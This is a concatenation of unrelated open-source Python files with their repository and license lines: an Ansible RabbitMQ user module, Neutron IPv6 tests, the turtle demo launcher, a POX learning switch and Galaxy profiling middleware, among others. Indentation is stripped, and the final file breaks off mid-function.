EXAMPLES = '''
# Add user to server and assign full access control on / vhost.
# The user might have permission rules for other vhost but you don't care.
- rabbitmq_user:
user: joe
password: changeme
vhost: /
configure_priv: .*
read_priv: .*
write_priv: .*
state: present
# Add user to server and assign full access control on / vhost.
# The user doesn't have permission rules for other vhosts
- rabbitmq_user:
user: joe
password: changeme
permissions:
- vhost: /
configure_priv: .*
read_priv: .*
write_priv: .*
state: present
'''
from ansible.module_utils.basic import AnsibleModule
class RabbitMqUser(object):
def __init__(self, module, username, password, tags, permissions,
node, bulk_permissions=False):
self.module = module
self.username = username
self.password = password
self.node = node
if not tags:
self.tags = list()
else:
self.tags = tags.split(',')
self.permissions = permissions
self.bulk_permissions = bulk_permissions
self._tags = None
self._permissions = []
self._rabbitmqctl = module.get_bin_path('rabbitmqctl', True)
def _exec(self, args, run_in_check_mode=False):
if not self.module.check_mode or run_in_check_mode:
cmd = [self._rabbitmqctl, '-q']
if self.node is not None:
cmd.extend(['-n', self.node])
rc, out, err = self.module.run_command(cmd + args, check_rc=True)
return out.splitlines()
return list()
def get(self):
users = self._exec(['list_users'], True)
for user_tag in users:
if '\t' not in user_tag:
continue
user, tags = user_tag.split('\t')
if user == self.username:
for c in ['[', ']', ' ']:
tags = tags.replace(c, '')
if tags != '':
self._tags = tags.split(',')
else:
self._tags = list()
self._permissions = self._get_permissions()
return True
return False
def _get_permissions(self):
perms_out = self._exec(['list_user_permissions', self.username], True)
perms_list = list()
for perm in perms_out:
vhost, configure_priv, write_priv, read_priv = perm.split('\t')
if not self.bulk_permissions:
if vhost == self.permissions[0]['vhost']:
perms_list.append(dict(vhost=vhost, configure_priv=configure_priv,
write_priv=write_priv, read_priv=read_priv))
break
else:
perms_list.append(dict(vhost=vhost, configure_priv=configure_priv,
write_priv=write_priv, read_priv=read_priv))
return perms_list
def add(self):
if self.password is not None:
self._exec(['add_user', self.username, self.password])
else:
self._exec(['add_user', self.username, ''])
self._exec(['clear_password', self.username])
def delete(self):
self._exec(['delete_user', self.username])
def set_tags(self):
self._exec(['set_user_tags', self.username] + self.tags)
def set_permissions(self):
for permission in self._permissions:
if permission not in self.permissions:
cmd = ['clear_permissions', '-p']
cmd.append(permission['vhost'])
cmd.append(self.username)
self._exec(cmd)
for permission in self.permissions:
if permission not in self._permissions:
cmd = ['set_permissions', '-p']
cmd.append(permission['vhost'])
cmd.append(self.username)
cmd.append(permission['configure_priv'])
cmd.append(permission['write_priv'])
cmd.append(permission['read_priv'])
self._exec(cmd)
def has_tags_modifications(self):
return set(self.tags) != set(self._tags)
def has_permissions_modifications(self):
return sorted(self._permissions) != sorted(self.permissions)
def main():
arg_spec = dict(
user=dict(required=True, aliases=['username', 'name']),
password=dict(default=None, no_log=True),
tags=dict(default=None),
permissions=dict(default=list(), type='list'),
vhost=dict(default='/'),
configure_priv=dict(default='^$'),
write_priv=dict(default='^$'),
read_priv=dict(default='^$'),
force=dict(default='no', type='bool'),
state=dict(default='present', choices=['present', 'absent']),
node=dict(default=None)
)
module = AnsibleModule(
argument_spec=arg_spec,
supports_check_mode=True
)
username = module.params['user']
password = module.params['password']
tags = module.params['tags']
permissions = module.params['permissions']
vhost = module.params['vhost']
configure_priv = module.params['configure_priv']
write_priv = module.params['write_priv']
read_priv = module.params['read_priv']
force = module.params['force']
state = module.params['state']
node = module.params['node']
bulk_permissions = True
if not permissions:
perm = {
'vhost': vhost,
'configure_priv': configure_priv,
'write_priv': write_priv,
'read_priv': read_priv
}
permissions.append(perm)
bulk_permissions = False
rabbitmq_user = RabbitMqUser(module, username, password, tags, permissions,
node, bulk_permissions=bulk_permissions)
result = dict(changed=False, user=username, state=state)
if rabbitmq_user.get():
if state == 'absent':
rabbitmq_user.delete()
result['changed'] = True
else:
if force:
rabbitmq_user.delete()
rabbitmq_user.add()
rabbitmq_user.get()
result['changed'] = True
if rabbitmq_user.has_tags_modifications():
rabbitmq_user.set_tags()
result['changed'] = True
if rabbitmq_user.has_permissions_modifications():
rabbitmq_user.set_permissions()
result['changed'] = True
elif state == 'present':
rabbitmq_user.add()
rabbitmq_user.set_tags()
rabbitmq_user.set_permissions()
result['changed'] = True
module.exit_json(**result)
if __name__ == '__main__':
main()
|
gpl-3.0
|
itdaniher/WeDoMore
|
setup.py
|
1
|
1174
|
#!/usr/bin/env python
import os
from setuptools import setup, find_packages
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name='wedo',
version='1.1.0',
packages=find_packages(),
install_requires=['pyusb'],
zip_safe=False,
include_package_data=True,
author="Guillaume BINET",
author_email="[email protected]",
description="This is a python library for the Lego WeDo, a tethered-over-USB sensing and robotics toolkit produced by Lego for the educational market.",
long_description=''.join([read('README.rst'), '\n\n', read('CHANGES.rst')]),
license="GPL",
keywords="lego wedo motor tilt sensor driver",
url="https://github.com/gbin/WeDoMore",
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Education",
"License :: OSI Approved :: GNU General Public License v2 (GPLv2)",
"Operating System :: POSIX :: Linux",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.2"]
)
|
gpl-2.0
|
mandeepdhami/neutron
|
neutron/tests/unit/common/test_ipv6_utils.py
|
24
|
5641
|
# Copyright 2013 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import mock
from neutron.common import constants
from neutron.common import ipv6_utils
from neutron.tests import base
class IPv6byEUI64TestCase(base.BaseTestCase):
"""Unit tests for generate IPv6 by EUI-64 operations."""
def test_generate_IPv6_by_EUI64(self):
addr = ipv6_utils.get_ipv6_addr_by_EUI64('2001:db8::',
'00:16:3e:33:44:55')
self.assertEqual('2001:db8::216:3eff:fe33:4455', addr.format())
def test_generate_IPv6_with_IPv4_prefix(self):
ipv4_prefix = '10.0.8'
mac = '00:16:3e:33:44:55'
self.assertRaises(TypeError, lambda:
ipv6_utils.get_ipv6_addr_by_EUI64(ipv4_prefix, mac))
def test_generate_IPv6_with_bad_mac(self):
bad_mac = '00:16:3e:33:44:5Z'
prefix = '2001:db8::'
self.assertRaises(TypeError, lambda:
ipv6_utils.get_ipv6_addr_by_EUI64(prefix, bad_mac))
def test_generate_IPv6_with_bad_prefix(self):
mac = '00:16:3e:33:44:55'
bad_prefix = 'bb'
self.assertRaises(TypeError, lambda:
ipv6_utils.get_ipv6_addr_by_EUI64(bad_prefix, mac))
def test_generate_IPv6_with_error_prefix_type(self):
mac = '00:16:3e:33:44:55'
prefix = 123
self.assertRaises(TypeError, lambda:
ipv6_utils.get_ipv6_addr_by_EUI64(prefix, mac))
class TestIsEnabled(base.BaseTestCase):
def setUp(self):
super(TestIsEnabled, self).setUp()
def reset_detection_flag():
ipv6_utils._IS_IPV6_ENABLED = None
reset_detection_flag()
self.addCleanup(reset_detection_flag)
self.mock_exists = mock.patch("os.path.exists",
return_value=True).start()
mock_open = mock.patch("six.moves.builtins.open").start()
self.mock_read = mock_open.return_value.__enter__.return_value.read
def test_enabled(self):
self.mock_read.return_value = "0"
enabled = ipv6_utils.is_enabled()
self.assertTrue(enabled)
def test_disabled(self):
self.mock_read.return_value = "1"
enabled = ipv6_utils.is_enabled()
self.assertFalse(enabled)
def test_disabled_non_exists(self):
self.mock_exists.return_value = False
enabled = ipv6_utils.is_enabled()
self.assertFalse(enabled)
self.assertFalse(self.mock_read.called)
def test_memoize(self):
self.mock_read.return_value = "0"
ipv6_utils.is_enabled()
enabled = ipv6_utils.is_enabled()
self.assertTrue(enabled)
self.mock_read.assert_called_once_with()
class TestIsAutoAddressSubnet(base.BaseTestCase):
def setUp(self):
self.subnet = {
'cidr': '2001:200::/64',
'gateway_ip': '2001:200::1',
'ip_version': 6,
'ipv6_address_mode': None,
'ipv6_ra_mode': None
}
super(TestIsAutoAddressSubnet, self).setUp()
def test_combinations(self):
Mode = collections.namedtuple('Mode', "addr_mode ra_mode "
"is_auto_address")
subnets = [
Mode(None, None, False),
Mode(constants.DHCPV6_STATEFUL, None, False),
Mode(constants.DHCPV6_STATELESS, None, True),
Mode(constants.IPV6_SLAAC, None, True),
Mode(None, constants.DHCPV6_STATEFUL, False),
Mode(None, constants.DHCPV6_STATELESS, True),
Mode(None, constants.IPV6_SLAAC, True),
Mode(constants.DHCPV6_STATEFUL, constants.DHCPV6_STATEFUL, False),
Mode(constants.DHCPV6_STATELESS, constants.DHCPV6_STATELESS, True),
Mode(constants.IPV6_SLAAC, constants.IPV6_SLAAC, True),
]
for subnet in subnets:
self.subnet['ipv6_address_mode'] = subnet.addr_mode
self.subnet['ipv6_ra_mode'] = subnet.ra_mode
self.assertEqual(subnet.is_auto_address,
ipv6_utils.is_auto_address_subnet(self.subnet))
class TestIsEui64Address(base.BaseTestCase):
def _test_eui_64(self, ips, expected):
for ip in ips:
self.assertEqual(expected, ipv6_utils.is_eui64_address(ip),
"Error on %s" % ip)
def test_valid_eui64_addresses(self):
ips = ('fffe::0cad:12ff:fe44:5566',
ipv6_utils.get_ipv6_addr_by_EUI64('2001:db8::',
'00:16:3e:33:44:55'))
self._test_eui_64(ips, True)
def test_invalid_eui64_addresses(self):
ips = ('192.168.1.1',
'192.168.1.0',
'255.255.255.255',
'0.0.0.0',
'fffe::',
'ff80::1',
'fffe::0cad:12ff:ff44:5566',
'fffe::0cad:12fe:fe44:5566',
'ffff:ffff:ffff:ffff:ffff:ffff:ffff:ffff')
self._test_eui_64(ips, False)
|
apache-2.0
|
Suiname/LearnPython
|
functions.py
|
1
|
1636
|
def my_function():
print "Hello From My Function!"
def my_function_with_args(username, greeting):
print "Hello, %s , From My Function!, I wish you %s"%(username, greeting)
def sum_two_numbers(a, b):
return a + b
# print a simple greeting
my_function()
#prints - "Hello, John Doe, From My Function!, I wish you a great year!"
my_function_with_args("John Doe", "a great year!")
# after this line x will hold the value 3!
x = sum_two_numbers(1,2)
print x
# In this exercise you'll use an existing function, and while adding your own to create a fully functional program.
#
# Add a function named list_benefits() that returns the following list of strings: "More organized code", "More readable code", "Easier code reuse", "Allowing programmers to share and connect code together"
#
# Add a function named build_sentence(info) which receives a single argument containing a string and returns a sentence starting with the given string and ending with the string " is a benefit of functions!"
#
# Run and see all the functions work together!
# Modify this function to return a list of strings as defined above
def list_benefits():
return ("More organized code", "More readable code", "Easier code reuse", "Allowing programmers to share and connect code together")
# Modify this function to concatenate to each benefit - " is a benefit of functions!"
def build_sentence(benefit):
return (benefit + " is a benefit of functions!")
def name_the_benefits_of_functions():
list_of_benefits = list_benefits()
for benefit in list_of_benefits:
print build_sentence(benefit)
name_the_benefits_of_functions()
|
mit
|
louietsai/python-for-android
|
python3-alpha/python3-src/Lib/turtledemo/__main__.py
|
55
|
9369
|
#!/usr/bin/env python3
import sys
import os
from tkinter import *
from idlelib.Percolator import Percolator
from idlelib.ColorDelegator import ColorDelegator
from idlelib.textView import view_file # TextViewer
from imp import reload
import turtle
import time
demo_dir = os.path.dirname(os.path.abspath(__file__))
STARTUP = 1
READY = 2
RUNNING = 3
DONE = 4
EVENTDRIVEN = 5
menufont = ("Arial", 12, NORMAL)
btnfont = ("Arial", 12, 'bold')
txtfont = ('Lucida Console', 8, 'normal')
def getExampleEntries():
return [entry[:-3] for entry in os.listdir(demo_dir) if
entry.endswith(".py") and entry[0] != '_']
def showDemoHelp():
view_file(demo.root, "Help on turtleDemo",
os.path.join(demo_dir, "demohelp.txt"))
def showAboutDemo():
view_file(demo.root, "About turtleDemo",
os.path.join(demo_dir, "about_turtledemo.txt"))
def showAboutTurtle():
view_file(demo.root, "About the new turtle module.",
os.path.join(demo_dir, "about_turtle.txt"))
class DemoWindow(object):
def __init__(self, filename=None): #, root=None):
self.root = root = turtle._root = Tk()
root.wm_protocol("WM_DELETE_WINDOW", self._destroy)
#################
self.mBar = Frame(root, relief=RAISED, borderwidth=2)
self.mBar.pack(fill=X)
self.ExamplesBtn = self.makeLoadDemoMenu()
self.OptionsBtn = self.makeHelpMenu()
self.mBar.tk_menuBar(self.ExamplesBtn, self.OptionsBtn) #, QuitBtn)
root.title('Python turtle-graphics examples')
#################
self.left_frame = left_frame = Frame(root)
self.text_frame = text_frame = Frame(left_frame)
self.vbar = vbar =Scrollbar(text_frame, name='vbar')
self.text = text = Text(text_frame,
name='text', padx=5, wrap='none',
width=45)
vbar['command'] = text.yview
vbar.pack(side=LEFT, fill=Y)
#####################
self.hbar = hbar =Scrollbar(text_frame, name='hbar', orient=HORIZONTAL)
hbar['command'] = text.xview
hbar.pack(side=BOTTOM, fill=X)
#####################
text['yscrollcommand'] = vbar.set
text.config(font=txtfont)
text.config(xscrollcommand=hbar.set)
text.pack(side=LEFT, fill=Y, expand=1)
#####################
self.output_lbl = Label(left_frame, height= 1,text=" --- ", bg = "#ddf",
font = ("Arial", 16, 'normal'))
self.output_lbl.pack(side=BOTTOM, expand=0, fill=X)
#####################
text_frame.pack(side=LEFT, fill=BOTH, expand=0)
left_frame.pack(side=LEFT, fill=BOTH, expand=0)
self.graph_frame = g_frame = Frame(root)
turtle._Screen._root = g_frame
turtle._Screen._canvas = turtle.ScrolledCanvas(g_frame, 800, 600, 1000, 800)
#xturtle.Screen._canvas.pack(expand=1, fill="both")
self.screen = _s_ = turtle.Screen()
#####
turtle.TurtleScreen.__init__(_s_, _s_._canvas)
#####
self.scanvas = _s_._canvas
#xturtle.RawTurtle.canvases = [self.scanvas]
turtle.RawTurtle.screens = [_s_]
self.scanvas.pack(side=TOP, fill=BOTH, expand=1)
self.btn_frame = btn_frame = Frame(g_frame, height=100)
self.start_btn = Button(btn_frame, text=" START ", font=btnfont, fg = "white",
disabledforeground = "#fed", command=self.startDemo)
self.start_btn.pack(side=LEFT, fill=X, expand=1)
self.stop_btn = Button(btn_frame, text=" STOP ", font=btnfont, fg = "white",
disabledforeground = "#fed", command = self.stopIt)
self.stop_btn.pack(side=LEFT, fill=X, expand=1)
self.clear_btn = Button(btn_frame, text=" CLEAR ", font=btnfont, fg = "white",
disabledforeground = "#fed", command = self.clearCanvas)
self.clear_btn.pack(side=LEFT, fill=X, expand=1)
self.btn_frame.pack(side=TOP, fill=BOTH, expand=0)
self.graph_frame.pack(side=TOP, fill=BOTH, expand=1)
Percolator(text).insertfilter(ColorDelegator())
self.dirty = False
self.exitflag = False
if filename:
self.loadfile(filename)
self.configGUI(NORMAL, DISABLED, DISABLED, DISABLED,
"Choose example from menu", "black")
self.state = STARTUP
def _destroy(self):
self.root.destroy()
sys.exit()
def configGUI(self, menu, start, stop, clear, txt="", color="blue"):
self.ExamplesBtn.config(state=menu)
self.start_btn.config(state=start)
if start == NORMAL:
self.start_btn.config(bg="#d00")
else:
self.start_btn.config(bg="#fca")
self.stop_btn.config(state=stop)
if stop == NORMAL:
self.stop_btn.config(bg="#d00")
else:
self.stop_btn.config(bg="#fca")
self.clear_btn.config(state=clear)
self.clear_btn.config(state=clear)
if clear == NORMAL:
self.clear_btn.config(bg="#d00")
else:
self.clear_btn.config(bg="#fca")
self.output_lbl.config(text=txt, fg=color)
def makeLoadDemoMenu(self):
CmdBtn = Menubutton(self.mBar, text='Examples', underline=0, font=menufont)
CmdBtn.pack(side=LEFT, padx="2m")
CmdBtn.menu = Menu(CmdBtn)
for entry in getExampleEntries():
def loadexample(x):
def emit():
self.loadfile(x)
return emit
CmdBtn.menu.add_command(label=entry, underline=0,
font=menufont, command=loadexample(entry))
CmdBtn['menu'] = CmdBtn.menu
return CmdBtn
def makeHelpMenu(self):
CmdBtn = Menubutton(self.mBar, text='Help', underline=0, font=menufont)
CmdBtn.pack(side=LEFT, padx='2m')
CmdBtn.menu = Menu(CmdBtn)
CmdBtn.menu.add_command(label='About turtle.py', font=menufont,
command=showAboutTurtle)
CmdBtn.menu.add_command(label='turtleDemo - Help', font=menufont,
command=showDemoHelp)
CmdBtn.menu.add_command(label='About turtleDemo', font=menufont,
command=showAboutDemo)
CmdBtn['menu'] = CmdBtn.menu
return CmdBtn
def refreshCanvas(self):
if not self.dirty: return
self.screen.clear()
#self.screen.mode("standard")
self.dirty=False
def loadfile(self, filename):
self.refreshCanvas()
modname = 'turtledemo.' + filename
__import__(modname)
self.module = sys.modules[modname]
with open(self.module.__file__, 'r') as f:
chars = f.read()
self.text.delete("1.0", "end")
self.text.insert("1.0", chars)
self.root.title(filename + " - a Python turtle graphics example")
reload(self.module)
self.configGUI(NORMAL, NORMAL, DISABLED, DISABLED,
"Press start button", "red")
self.state = READY
def startDemo(self):
self.refreshCanvas()
self.dirty = True
turtle.TurtleScreen._RUNNING = True
self.configGUI(DISABLED, DISABLED, NORMAL, DISABLED,
"demo running...", "black")
self.screen.clear()
self.screen.mode("standard")
self.state = RUNNING
try:
result = self.module.main()
if result == "EVENTLOOP":
self.state = EVENTDRIVEN
else:
self.state = DONE
except turtle.Terminator:
self.state = DONE
result = "stopped!"
if self.state == DONE:
self.configGUI(NORMAL, NORMAL, DISABLED, NORMAL,
result)
elif self.state == EVENTDRIVEN:
self.exitflag = True
self.configGUI(DISABLED, DISABLED, NORMAL, DISABLED,
"use mouse/keys or STOP", "red")
def clearCanvas(self):
self.refreshCanvas()
self.screen._delete("all")
self.scanvas.config(cursor="")
self.configGUI(NORMAL, NORMAL, DISABLED, DISABLED)
def stopIt(self):
if self.exitflag:
self.clearCanvas()
self.exitflag = False
self.configGUI(NORMAL, NORMAL, DISABLED, DISABLED,
"STOPPED!", "red")
turtle.TurtleScreen._RUNNING = False
#print "stopIT: exitflag = True"
else:
turtle.TurtleScreen._RUNNING = False
#print "stopIt: exitflag = False"
if __name__ == '__main__':
demo = DemoWindow()
RUN = True
while RUN:
try:
#print("ENTERING mainloop")
demo.root.mainloop()
except AttributeError:
#print("AttributeError!- WAIT A MOMENT!")
time.sleep(0.3)
print("GOING ON ..")
demo.ckearCanvas()
except TypeError:
demo.screen._delete("all")
#print("CRASH!!!- WAIT A MOMENT!")
time.sleep(0.3)
#print("GOING ON ..")
demo.clearCanvas()
except:
print("BYE!")
RUN = False
|
apache-2.0
|
ali-salman/Aspose_Words_Java
|
Plugins/Aspose_Words_Java_for_Jython/asposewords/programming_documents/InsertBarcode.py
|
4
|
2722
|
from asposewords import Settings
from com.aspose.words import Document
from com.aspose.words import DocumentBuilder
from com.aspose.words import HeaderFooterType
from com.aspose.words import ControlChar
from com.aspose.words import SectionStart
from com.aspose.words import TabAlignment
from com.aspose.words import TabLeader
from com.aspose.words import TabStop
from java.io import File
from javax.imageio import ImageIO
class InsertBarcodeOnEachPage:
def __init__(self):
self.dataDir = Settings.dataDir + 'programming_documents/'
# Create a blank document.
doc = Document()
builder = DocumentBuilder(doc)
# The number of pages the document should have.
numPages = 4
# The document starts with one section, insert the barcode into this existing section.
self.insert_barcode_into_footer(builder, doc.getFirstSection(), 1, HeaderFooterType.FOOTER_PRIMARY)
i = 1
while (i < numPages) :
# Clone the first section and add it into the end of the document.
cloneSection = doc.getFirstSection().deepClone(False)
cloneSection.getPageSetup().setSectionStart(SectionStart.NEW_PAGE)
doc.appendChild(cloneSection)
# Insert the barcode and other information into the footer of the section.
self.insert_barcode_into_footer(builder, cloneSection, i, HeaderFooterType.FOOTER_PRIMARY)
i = i + 1
# Save the document as a PDF to disk. You can also save this directly to a stream.
doc.save(self.dataDir + "InsertBarcodeOnEachPage.docx")
print "Aspose Barcode Inserted..."
def insert_barcode_into_footer(self, builder, section, pageId, footerType):
# Move to the footer type in the specific section.
builder.moveToSection(section.getDocument().indexOf(section))
builder.moveToHeaderFooter(footerType)
# Insert the barcode, then move to the next line and insert the ID
# along with the page number.
# Use pageId if you need to insert a different barcode on each page. 0
# = First page, 1 = Second page etc.
builder.insertImage(ImageIO.read(File(self.dataDir + "barcode.png")))
builder.writeln()
builder.write("1234567890")
builder.insertField("PAGE")
# Create a right aligned tab at the right margin.
tabPos = section.getPageSetup().getPageWidth() - section.getPageSetup().getRightMargin() - section.getPageSetup().getLeftMargin()
builder.getCurrentParagraph().getParagraphFormat().getTabStops().add(TabStop(tabPos, TabAlignment.RIGHT, TabLeader.NONE))
# Move to the right hand side of the page and insert the page and page total.
builder.write(ControlChar.TAB)
builder.insertField("PAGE")
builder.write(" of ")
builder.insertField("NUMPAGES")
if __name__ == '__main__':
InsertBarcodeOnEachPage()
|
mit
|
timhuanggithub/pox_load_balancing
|
pox/forwarding/l2_learning.py
|
25
|
6779
|
# Copyright 2011 James McCauley
#
# This file is part of POX.
#
# POX is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# POX is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with POX. If not, see <http://www.gnu.org/licenses/>.
"""
An L2 learning switch.
It is derived from one written live for an SDN crash course.
It is somwhat similar to NOX's pyswitch in that it installs
exact-match rules for each flow.
"""
from pox.core import core
import pox.openflow.libopenflow_01 as of
from pox.lib.util import dpid_to_str
from pox.lib.util import str_to_bool
import time
log = core.getLogger()
# We don't want to flood immediately when a switch connects.
# Can be overriden on commandline.
_flood_delay = 0
class LearningSwitch (object):
"""
The learning switch "brain" associated with a single OpenFlow switch.
When we see a packet, we'd like to output it on a port which will
eventually lead to the destination. To accomplish this, we build a
table that maps addresses to ports.
We populate the table by observing traffic. When we see a packet
from some source coming from some port, we know that source is out
that port.
When we want to forward traffic, we look up the desintation in our
table. If we don't know the port, we simply send the message out
all ports except the one it came in on. (In the presence of loops,
this is bad!).
In short, our algorithm looks like this:
For each packet from the switch:
1) Use source address and switch port to update address/port table
2) Is transparent = False and either Ethertype is LLDP or the packet's
destination address is a Bridge Filtered address?
Yes:
2a) Drop packet -- don't forward link-local traffic (LLDP, 802.1x)
DONE
3) Is destination multicast?
Yes:
3a) Flood the packet
DONE
4) Port for destination address in our address/port table?
No:
4a) Flood the packet
DONE
5) Is output port the same as input port?
Yes:
5a) Drop packet and similar ones for a while
6) Install flow table entry in the switch so that this
flow goes out the appopriate port
6a) Send the packet out appropriate port
"""
def __init__ (self, connection, transparent):
# Switch we'll be adding L2 learning switch capabilities to
self.connection = connection
self.transparent = transparent
# Our table
self.macToPort = {}
# We want to hear PacketIn messages, so we listen
# to the connection
connection.addListeners(self)
# We just use this to know when to log a helpful message
self.hold_down_expired = _flood_delay == 0
#log.debug("Initializing LearningSwitch, transparent=%s",
# str(self.transparent))
def _handle_PacketIn (self, event):
"""
Handle packet in messages from the switch to implement above algorithm.
"""
packet = event.parsed
def flood (message = None):
""" Floods the packet """
msg = of.ofp_packet_out()
if time.time() - self.connection.connect_time >= _flood_delay:
# Only flood if we've been connected for a little while...
if self.hold_down_expired is False:
# Oh yes it is!
self.hold_down_expired = True
log.info("%s: Flood hold-down expired -- flooding",
dpid_to_str(event.dpid))
if message is not None: log.debug(message)
#log.debug("%i: flood %s -> %s", event.dpid,packet.src,packet.dst)
# OFPP_FLOOD is optional; on some switches you may need to change
# this to OFPP_ALL.
msg.actions.append(of.ofp_action_output(port = of.OFPP_FLOOD))
else:
pass
#log.info("Holding down flood for %s", dpid_to_str(event.dpid))
msg.data = event.ofp
msg.in_port = event.port
self.connection.send(msg)
def drop (duration = None):
"""
Drops this packet and optionally installs a flow to continue
dropping similar ones for a while
"""
if duration is not None:
if not isinstance(duration, tuple):
duration = (duration,duration)
msg = of.ofp_flow_mod()
msg.match = of.ofp_match.from_packet(packet)
msg.idle_timeout = duration[0]
msg.hard_timeout = duration[1]
msg.buffer_id = event.ofp.buffer_id
self.connection.send(msg)
elif event.ofp.buffer_id is not None:
msg = of.ofp_packet_out()
msg.buffer_id = event.ofp.buffer_id
msg.in_port = event.port
self.connection.send(msg)
self.macToPort[packet.src] = event.port # 1
if not self.transparent: # 2
if packet.type == packet.LLDP_TYPE or packet.dst.isBridgeFiltered():
drop() # 2a
return
if packet.dst.is_multicast:
flood() # 3a
else:
if packet.dst not in self.macToPort: # 4
flood("Port for %s unknown -- flooding" % (packet.dst,)) # 4a
else:
port = self.macToPort[packet.dst]
if port == event.port: # 5
# 5a
log.warning("Same port for packet from %s -> %s on %s.%s. Drop."
% (packet.src, packet.dst, dpid_to_str(event.dpid), port))
drop(10)
return
# 6
log.debug("installing flow for %s.%i -> %s.%i" %
(packet.src, event.port, packet.dst, port))
msg = of.ofp_flow_mod()
msg.match = of.ofp_match.from_packet(packet, event.port)
msg.idle_timeout = 10
msg.hard_timeout = 30
msg.actions.append(of.ofp_action_output(port = port))
msg.data = event.ofp # 6a
self.connection.send(msg)
class l2_learning (object):
"""
Waits for OpenFlow switches to connect and makes them learning switches.
"""
def __init__ (self, transparent):
core.openflow.addListeners(self)
self.transparent = transparent
def _handle_ConnectionUp (self, event):
log.debug("Connection %s" % (event.connection,))
LearningSwitch(event.connection, self.transparent)
def launch (transparent=False, hold_down=_flood_delay):
"""
Starts an L2 learning switch.
"""
try:
global _flood_delay
_flood_delay = int(str(hold_down), 10)
assert _flood_delay >= 0
except:
raise RuntimeError("Expected hold-down to be a number")
core.registerNew(l2_learning, str_to_bool(transparent))
|
gpl-3.0
|
volpino/Yeps-EURAC
|
lib/galaxy/web/framework/middleware/profile.py
|
2
|
6006
|
"""
Middleware that profiles the request with cProfile and displays profiling
information at the bottom of each page.
"""
import sys
import os
import threading
import cgi
import time
from cStringIO import StringIO
from paste import response
try:
# Included in Python 2.5
import cProfile
except:
try:
# Included in lsprof package for Python 2.4
import pkg_resources
pkg_resources.require( "lsprof" )
import cProfile
except:
cProfile = None
import pstats
template = """
<script>
function show_profile_output()
{
var win = window.open("", "win"); // a window object
var doc = win.document;
doc.open("text/html", "replace");
doc.write("<HTML><HEAD><TITLE>Profiler output</TITLE></HEAD><BODY>")
doc.write(document.getElementById( 'profile_output' ).innerHTML)
doc.write("</BODY></HTML>");
doc.close();
}
function show_inline()
{
document.getElementById( 'profile_output' ).style.display="block";
}
</script>
<div style="background-color: #ff9; color: #000; border: 2px solid #000; padding: 5px;">
show profile output: <a href="javascript:show_inline();">inline</a> | <a href="javascript:show_profile_output();">new window</a>
<div id="profile_output" style="display: none">
<hr />
%s
</div>
</div>
"""
class ProfileMiddleware(object):
"""
Middleware that profiles all requests.
All HTML pages will have profiling information appended to them.
The data is isolated to that single request, and does not include
data from previous requests.
"""
def __init__( self, app, global_conf=None, limit=40 ):
self.app = app
self.lock = threading.Lock()
self.limit = limit
def __call__(self, environ, start_response):
catch_response = []
body = []
def replace_start_response(status, headers, exc_info=None):
catch_response.extend([status, headers])
start_response(status, headers, exc_info)
return body.append
def run_app():
body.extend(self.app(environ, replace_start_response))
# Run in profiler
prof = cProfile.Profile()
prof.runctx( "run_app()", globals(), locals() )
# Build up body with stats
body = ''.join(body)
headers = catch_response[1]
content_type = response.header_value(headers, 'content-type')
if not content_type.startswith('text/html'):
# We can't add info to non-HTML output
return [body]
stats = pstats.Stats( prof )
stats.strip_dirs()
stats.sort_stats( 'time', 'calls' )
output = pstats_as_html( stats, self.limit )
body += template % output
return [body]
def pstats_as_html( stats, *sel_list ):
"""
Return an HTML representation of a pstats.Stats object.
"""
rval = []
# Number of function calls, primitive calls, total time
rval.append( "<div>%d function calls (%d primitive) in %0.3f CPU seconds</div>"
% ( stats.total_calls, stats.prim_calls, stats.total_tt ) )
# Extract functions that match 'sel_list'
funcs, order_message, select_message = get_func_list( stats, sel_list )
# Deal with any ordering or selection messages
if order_message:
rval.append( "<div>%s</div>" % cgi.escape( order_message ) )
if select_message:
rval.append( "<div>%s</div>" % cgi.escape( select_message ) )
# Build a table for the functions
if list:
rval.append( "<table>" )
# Header
rval.append( "<tr><th>ncalls</th>"
"<th>tottime</th>"
"<th>percall</th>"
"<th>cumtime</th>"
"<th>percall</th>"
"<th>filename:lineno(function)</th></tr>" )
for func in funcs:
rval.append( "<tr>" )
# Calculate each field
cc, nc, tt, ct, callers = stats.stats[ func ]
# ncalls
ncalls = str(nc)
if nc != cc:
ncalls = ncalls + '/' + str(cc)
rval.append( "<td>%s</td>" % cgi.escape( ncalls ) )
# tottime
rval.append( "<td>%0.8f</td>" % tt )
# percall
if nc == 0:
percall = ""
else:
percall = "%0.8f" % ( tt / nc )
rval.append( "<td>%s</td>" % cgi.escape( percall ) )
# cumtime
rval.append( "<td>%0.8f</td>" % ct )
# ctpercall
if cc == 0:
ctpercall = ""
else:
ctpercall = "%0.8f" % ( ct / cc )
rval.append( "<td>%s</td>" % cgi.escape( ctpercall ) )
# location
rval.append( "<td>%s</td>" % cgi.escape( func_std_string( func ) ) )
# row complete
rval.append( "</tr>" )
rval.append( "</table>")
# Concatenate result
return "".join( rval )
def get_func_list( stats, sel_list ):
"""
Use 'sel_list' to select a list of functions to display.
"""
# Determine if an ordering was applied
if stats.fcn_list:
list = stats.fcn_list[:]
order_message = "Ordered by: " + stats.sort_type
else:
list = stats.stats.keys()
order_message = "Random listing order was used"
# Do the selection and accumulate messages
select_message = ""
for selection in sel_list:
list, select_message = stats.eval_print_amount( selection, list, select_message )
# Return the list of functions selected and the message
return list, order_message, select_message
def func_std_string( func_name ):
"""
Match what old profile produced
"""
if func_name[:2] == ('~', 0):
# special case for built-in functions
name = func_name[2]
if name.startswith('<') and name.endswith('>'):
return '{%s}' % name[1:-1]
else:
return name
else:
